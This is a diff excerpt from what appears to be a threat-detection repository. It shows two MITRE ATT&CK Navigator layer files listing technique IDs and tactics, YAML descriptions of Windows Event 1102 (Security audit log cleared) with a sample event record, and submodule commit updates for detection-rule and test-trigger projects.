{"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1086", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1158", "tactic": "persistence", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}
{"version": "2.1", "domain": "mitre-enterprise", "description": "", "filters": {"stages": ["act"], "platforms": ["linux", "windows"]}, "sorting": 0, "viewMode": 0, "hideDisabled": true, "techniques": [{"techniqueID": "T1047", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1003", "tactic": "credential-access", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1088", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1191", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T0069", "tactic": "execution", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1036", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "defense-evasion", "color": "#fcf26b", "comment": "", "enabled": true}, {"techniqueID": "T1055", "tactic": "privilege-escalation", "color": "#fcf26b", "comment": "", "enabled": true}], "gradient": {"colors": ["#ff6666", "#ffe766", "#8ec843"], "minValue": 0, "maxValue": 100}, "legendItems": [], "showTacticRowBackground": false, "tacticRowBackground": "#dddddd", "selectTechniquesAcrossTactics": true, "name": "TESTCUSTOMER"}

50
data_needed/DN_0025_1102_the_audit_log_was_cleared.yml
View File

@ -1,50 +0,0 @@
title: DN_0038_1102_the_audit_log_was_cleared
description: >
Event 1102 is logged whenever the Security log is cleared,
REGARDLESS of the status of the Audit System Events audit policy
loggingpolicy:
- none
references:
- https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-1102#security-monitoring-recommendations
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
category: OS Logs
platform: Windows
type: Windows Log
channel: Security
provider: Microsoft-Windows-Eventlog
fields:
- EventID
- Hostname # redundant
- Computer
- SubjectUserSid
- SubjectUserName
- SubjectDomainName
- SubjectLogonId
sample: |
- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
- <System>
<Provider Name="Microsoft-Windows-Eventlog" Guid="{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}" />
<EventID>1102</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>104</Task>
<Opcode>0</Opcode>
<Keywords>0x4020000000000000</Keywords>
<TimeCreated SystemTime="2015-10-16T00:39:58.656871200Z" />
<EventRecordID>1087729</EventRecordID>
<Correlation />
<Execution ProcessID="820" ThreadID="2644" />
<Channel>Security</Channel>
<Computer>DC01.contoso.local</Computer>
<Security />
</System>
- <UserData>
- <LogFileCleared xmlns="http://manifests.microsoft.com/win/2004/08/windows/eventlog">
<SubjectUserSid>S-1-5-21-3457937927-2839227994-823803824-1104</SubjectUserSid>
<SubjectUserName>dadmin</SubjectUserName>
<SubjectDomainName>CONTOSO</SubjectDomainName>
<SubjectLogonId>0x55cd1d</SubjectLogonId>
</LogFileCleared>
</UserData>
</Event>

4
data_needed/DN_0050_1102_audit_log_was_cleared.yml
View File

@ -1,10 +1,12 @@
title: DN_0050_1102_audit_log_was_cleared
description: >
This event generates every time Windows Security audit log was cleared
Event 1102 is created whenever the Security log is cleared,
REGARDLESS of the status of the Audit System Events audit policy
loggingpolicy:
- None
references:
- https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-1102.md
- https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=1102
category: OS Logs
platform: Windows
type: Windows Log

2
detection_rules/sigma

@ -1 +1 @@
Subproject commit 5ea623506f95832177c245c8c072d1c71d06c192
Subproject commit 693830fa838da070e125342bf108efc8cf8f9d42

2
response/atc-response

@ -1 +1 @@
Subproject commit f54b8ec6cb83b7214b9560115df004c404ccbc6c
Subproject commit 155fbfa6df7b8b10b92f22a2fec083e4db373402

2
triggers/atomic-red-team

@ -1 +1 @@
Subproject commit 9476a6348d4ce62931993af6b953688666ca2453
Subproject commit d58d614940e9ac224677c6d49625e5274c0047be